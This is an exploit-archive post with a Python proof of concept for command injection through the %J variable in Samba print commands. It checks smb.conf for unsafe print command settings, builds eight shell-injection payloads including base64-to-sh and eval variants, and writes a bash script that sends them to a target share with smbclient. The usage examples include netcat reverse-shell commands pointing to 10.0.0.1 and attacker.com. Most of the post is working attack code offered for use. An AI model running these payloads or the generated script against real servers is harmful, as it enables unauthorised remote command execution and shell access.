==================================================================================================================================
| # Title : Samba 4.22.10, 4.23.8 and 4.24.3 - Print Command Injection |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://www.samba.org/ |
==================================================================================================================================
[+] Summary : This Python proof-of-concept framework analyzes Samba printing configurations for unsafe print command usage involving the %J variable
and demonstrates how command injection conditions could arise in vulnerable setups.
[+] POC : python3 poc.py -c /etc/samba/smb.conf
python3 poc.py -c smb.conf -t 192.168.1.100 -e "id" --simulate
python3 poc.py -c smb.conf -t 192.168.1.100 -e "nc -e /bin/sh 10.0.0.1 4444" -o exploit.sh
python3 poc.py -c /etc/samba/smb.conf -t 10.0.0.10 -e "whoami"
#!/usr/bin/env python3
import argparse
import base64
import re
import socket
import subprocess
import sys
from pathlib import Path
from typing import Dict, Optional, Tuple
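class SambaPrintExploit:
    """PoC to exploit a command injection vulnerability in print commands with %J.

    In practice the class only inspects an smb.conf file and prints what it
    would try: no method here submits a print job. check_smb_access is the
    one method that opens a network connection, and it merely tests whether
    the SMB port answers; generate_exploit_script writes a local file.
    """

    # Section header such as "[printers]"; group 1 is the share name.
    _SHARE_RE = re.compile(r'^\s*\[([^\]]+)\]')
    # "print command = ..." (case-insensitive, leading whitespace allowed).
    _PRINT_CMD_RE = re.compile(r'^\s*print\s+command\s*=\s*(.+)$', re.IGNORECASE)
    # "printing = ..." anywhere in the file; the first occurrence wins.
    _PRINTING_RE = re.compile(r'^\s*printing\s*=\s*(.+)$', re.MULTILINE | re.IGNORECASE)
    # Ordering used to keep the riskiest share when a config defines several.
    _RISK_ORDER = {"low": 0, "medium": 1, "high": 2}

    def __init__(self, target_host: str, smb_port: int = 445):
        """Remember the host/port used by check_smb_access and in the report output.

        Args:
            target_host: host name or address printed in reports and probed.
            smb_port: TCP port probed by check_smb_access (default 445).
        """
        self.target_host = target_host
        self.smb_port = smb_port
        # Never filled by this class; kept so existing callers reading it still work.
        self.payloads = []

    def check_smb_access(self) -> bool:
        """Return True when a TCP connection to target_host:smb_port succeeds.

        A 3-second timeout bounds the probe. Any socket failure (unresolvable
        host, refused, timeout) counts as "not accessible" rather than raising.
        """
        try:
            # `with` closes the socket even when connect_ex raises (e.g. a
            # resolver error); the original only closed it on the normal path.
            with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
                sock.settimeout(3)
                return sock.connect_ex((self.target_host, self.smb_port)) == 0
        except (OSError, OverflowError):
            return False

    def build_payloads(self, command: str) -> list:
        """Return the candidate %J values this tool would try for *command*.

        Each entry is a dict with "name", "j_value" and "description". The
        entries are only ever printed by simulate_exploit; nothing submits them.

        Args:
            command: the shell command string to embed in each variant.
        """
        encoded_cmd = base64.b64encode(command.encode()).decode()
        return [
            {
                "name": "Direct injection",
                "j_value": f"'; {command} #",
                "description": "Direct injection using; to finish",
            },
            {
                "name": "Backticks injection",
                "j_value": f"`{command}`",
                "description": "Using backticks to execute the command",
            },
            {
                "name": "Command substitution",
                "j_value": f"$({command})",
                "description": "Use $() to execute the command",
            },
            {
                "name": "Pipe injection",
                "j_value": f"' | {command} #",
                "description": "injection via pipe",
            },
            {
                "name": "AND operator",
                "j_value": f"' && {command} #",
                "description": "Injection using &&",
            },
            {
                "name": "OR operator",
                "j_value": f"' || {command} #",
                "description": "Injection using ||",
            },
            {
                "name": "Base64 encoded",
                "j_value": f"' && echo {encoded_cmd} | base64 -d | sh #",
                "description": "Encrypting the command using Base64",
            },
            {
                "name": "Environment variable",
                "j_value": f"'; $CMD='{command}'; eval $CMD #",
                "description": "Injection via environmental variables",
            },
        ]

    @staticmethod
    def _assess_print_command(cmd: str) -> Tuple[str, Optional[str]]:
        """Classify one `print command` value by how %J appears in it.

        Returns:
            (risk_level, note). risk_level is "low" when %J is absent (note is
            None), "medium" when %J is wrapped in single or double quotes, and
            "high" when it is unquoted.
        """
        if "%J" not in cmd:
            return "low", None
        if "'%J'" in cmd:
            return "medium", "Single quotes provide partial protection"
        if '"%J"' in cmd:
            return "medium", "Double quotes are vulnerable"
        return "high", "CRITICAL: %J unquoted - Direct injection possible"

    def analyze_config(self, config_path: str) -> Optional[Dict]:
        """Parse an smb.conf and report whether a `print command` embeds %J unsafely.

        Args:
            config_path: path of the smb.conf to inspect.

        Returns:
            A findings dict with the keys vulnerable, printing_mode,
            print_command, uses_percent_j, risk_level, share_name,
            exploit_command and notes, or None when the file cannot be read
            (the error is printed).

        When several shares define a print command, the riskiest one is the
        share reported (first one wins on ties). The original kept whichever
        share came last in the file, so a safe share could overwrite the
        details of an unsafe one while `vulnerable` stayed True.
        `exploit_command` is only filled for an unquoted %J.
        """
        try:
            content = Path(config_path).read_text(encoding="utf-8", errors="ignore")
        except OSError as e:
            print(f"[ERROR] Cannot read config: {e}")
            return None

        findings: Dict = {
            "vulnerable": False,
            "printing_mode": "unknown",
            "print_command": None,
            "uses_percent_j": False,
            "risk_level": "low",
            "share_name": None,
            "exploit_command": None,
            "notes": [],
        }

        current_share = None  # name of the [section] being read; None before the first header
        best_rank = -1        # rank of the riskiest print command recorded so far
        for line in content.splitlines():
            share_match = self._SHARE_RE.match(line)
            if share_match:
                current_share = share_match.group(1)
                continue
            cmd_match = self._PRINT_CMD_RE.search(line)
            # A print command before any section header is ignored, as before.
            if not cmd_match or current_share is None:
                continue
            cmd = cmd_match.group(1).strip()
            risk, note = self._assess_print_command(cmd)
            if "%J" in cmd:
                findings["uses_percent_j"] = True
                findings["vulnerable"] = True
            if note:
                findings["notes"].append(note)
            rank = self._RISK_ORDER[risk]
            if rank > best_rank:
                best_rank = rank
                findings["print_command"] = cmd
                findings["share_name"] = current_share
                findings["risk_level"] = risk
                # Literal "{{command}}" placeholder, substituted by simulate_exploit.
                findings["exploit_command"] = (
                    f"print {current_share} '; {{{{command}}}} #'" if risk == "high" else None
                )

        # The first "printing =" found anywhere in the file is taken as the
        # mode, whichever section it sits in; per-section values are not
        # distinguished here.
        printing_match = self._PRINTING_RE.search(content)
        if printing_match:
            mode = printing_match.group(1).strip().lower()
            findings["printing_mode"] = mode
            if mode in ("cups", "iprint"):
                findings["risk_level"] = "low"
                findings["vulnerable"] = False
                findings["notes"].append(f"Printing mode '{mode}' is likely safe")
        return findings

    def simulate_exploit(self, findings: Dict, command: str) -> Dict:
        """Print the payloads that would be tried and return a result dict.

        Nothing is sent to the target: "success" is only a prediction derived
        from findings["risk_level"] == "high".

        Args:
            findings: dict returned by analyze_config.
            command: command string passed to build_payloads.

        Returns:
            A dict with "success", "message" and "payload_tested"; when the
            findings are vulnerable it also carries "command", "response" and
            "exploit_method".
        """
        if not findings["vulnerable"]:
            return {
                "success": False,
                "message": "Target does not appear vulnerable",
                "payload_tested": None,
            }
        results: Dict = {
            "success": False,
            "command": command,
            "payload_tested": None,
            "response": None,
            "exploit_method": None,
            # Present on every path so callers can always read results["message"];
            # the original omitted it here and main() raised KeyError on failure.
            "message": "No payload rated as successful (simulated)",
        }
        print(f"\n[+] Target: {self.target_host}")
        print(f"[+] Share: {findings['share_name']}")
        print(f"[+] Risk Level: {findings['risk_level']}")
        payloads = self.build_payloads(command)
        print(f"\n[*] Generated {len(payloads)} payloads:")
        # exploit_command is None for quoted (medium-risk) findings; the
        # original called .replace() on it and crashed with AttributeError.
        template = findings.get("exploit_command")
        for i, payload in enumerate(payloads, 1):
            print(f"\n [{i}] {payload['name']}")
            print(f" Description: {payload['description']}")
            print(f" %J Value: {payload['j_value']}")
            if template:
                final_cmd = template.replace('{{command}}', payload['j_value'])
                print(f" SMB Command: {final_cmd}")
            results["payload_tested"] = payload
            results["exploit_method"] = payload['name']
            if findings['risk_level'] == "high":
                results["success"] = True
                results["response"] = "Command likely executed (simulated)"
                results["message"] = results["response"]
                break
        return results

    def generate_exploit_script(self, findings: Dict, command: str, output_file: str) -> str:
        """Write a bash script to *output_file*, mark it executable and return its path.

        Args:
            findings: dict returned by analyze_config (share_name and risk_level used).
            command: command string embedded in the script.
            output_file: destination path; overwritten if it exists.
        """
        script_content = f"""#!/bin/bash
# Samba Print Command Exploit - Generated PoC
# Target: {self.target_host}
# Share: {findings['share_name']}
# Risk: {findings['risk_level']}
echo "[+] Exploiting Samba print command vulnerability..."
# Method 1: Direct injection
smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "; {command} #"'
smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "`{command}`"'
smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "$({command})"'
echo "{command}" | smbclient "//{self.target_host}/{findings['share_name']}" -N -c 'print "-"'
echo "[+] Exploit attempts completed"
"""
        output_path = Path(output_file)
        # Explicit encoding so the result does not depend on the locale.
        output_path.write_text(script_content, encoding="utf-8")
        output_path.chmod(0o755)
        print(f"[+] Exploit script saved to: {output_file}")
        return output_file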
def print_banner():
    """Print the tool banner (blank line, box, blank line) to stdout."""
    rows = [
        "",
        "βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ",
        "β Samba Print Command Injection - PoC Exploit β",
        "β by Indoushka β",
        "βββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ",
        "",
    ]
    # Joining with newlines reproduces the original triple-quoted text exactly.
    print("\n".join(rows))
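def main():
    """CLI entry point: analyze an smb.conf, then optionally simulate or emit a script.

    Exits with status 1 when the config cannot be analyzed or when -e is given
    without -t. Both the "--simulate" and the "live" branches call
    simulate_exploit, which only prints payloads; nothing is sent to the host.
    """
    print_banner()
    parser = argparse.ArgumentParser(
        description="Samba Print Command Injection PoC",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
EXAMPLES:
%(prog)s -c /etc/samba/smb.conf
%(prog)s -c /etc/samba/smb.conf -t 192.168.1.100 -e "id > /tmp/indoushka"
%(prog)s -c /etc/samba/smb.conf -t 192.168.1.100 -e "nc -e /bin/sh attacker.com 4444" -o indoushka.sh
""",
    )
    parser.add_argument("-c", "--config", required=True, help="Path to smb.conf")
    parser.add_argument("-t", "--target", help="Target host for exploitation")
    parser.add_argument("-e", "--execute", help="Command to execute on target")
    parser.add_argument("-o", "--output", help="Output exploit script to file")
    parser.add_argument("--simulate", action="store_true", help="Simulate exploitation without actual connection")
    args = parser.parse_args()

    print(f"[*] Analyzing configuration: {args.config}")
    # Without -t the report and the port probe use localhost.
    exploiter = SambaPrintExploit(args.target or "localhost")
    findings = exploiter.analyze_config(args.config)
    if not findings:
        print("[ERROR] Analysis failed")
        sys.exit(1)

    print("\n=== Configuration Analysis ===")
    print(f"Vulnerable : {'YES' if findings['vulnerable'] else 'NO'}")
    print(f"Printing Mode : {findings['printing_mode']}")
    print(f"Print Command : {findings['print_command']}")
    print(f"Share Name : {findings['share_name']}")
    print(f"Risk Level : {findings['risk_level']}")
    for note in findings['notes']:
        print(f" No {note}")

    if args.execute and findings['vulnerable']:
        if not args.target:
            print("[ERROR] Target required for exploitation (-t)")
            sys.exit(1)
        print(f"\n[*] Checking SMB access to {args.target}:445...")
        if exploiter.check_smb_access():
            print("[+] SMB port is accessible")
        else:
            # Deliberately not fatal: the rest of this path only simulates.
            print("[!] SMB port not accessible, but continuing with simulation")
        if args.simulate:
            print("\n[*] Running in simulation mode...")
            result = exploiter.simulate_exploit(findings, args.execute)
            if result['success']:
                print("\n[!] SUCCESS! Command injection possible!")
                print(f"[!] Payload: {result['payload_tested']['j_value']}")
                print(f"[!] Method: {result['exploit_method']}")
            else:
                print(f"\n[-] Exploit failed: {result['message']}")
        else:
            print("\n[!] LIVE EXPLOITATION MODE")
            print("[!] Make sure you have permission to test this target!")
            # Despite the banner above this path also only calls simulate_exploit.
            result = exploiter.simulate_exploit(findings, args.execute)
            if result['success']:
                print("\n[+] Exploit simulation successful!")
                print(f"[+] Command: {args.execute}")
                if args.output:
                    exploiter.generate_exploit_script(findings, args.execute, args.output)
            else:
                print("\n[-] Exploit failed")
    elif args.execute and not findings['vulnerable']:
        print("\n[-] Target is not vulnerable, exploitation not possible")
    elif args.target and not args.execute:
        print("\n[*] Target specified without exploit command (-e)")

    # -o without -e: the script is still written, with a placeholder command.
    if args.output and not args.execute:
        dummy_cmd = "id"
        exploiter.generate_exploit_script(findings, dummy_cmd, args.output)
    print("\n[*] Analysis complete")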
# Run the CLI only when executed as a script; importing the module defines the
# class and helpers without side effects.
if __name__ == "__main__":
    main()
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================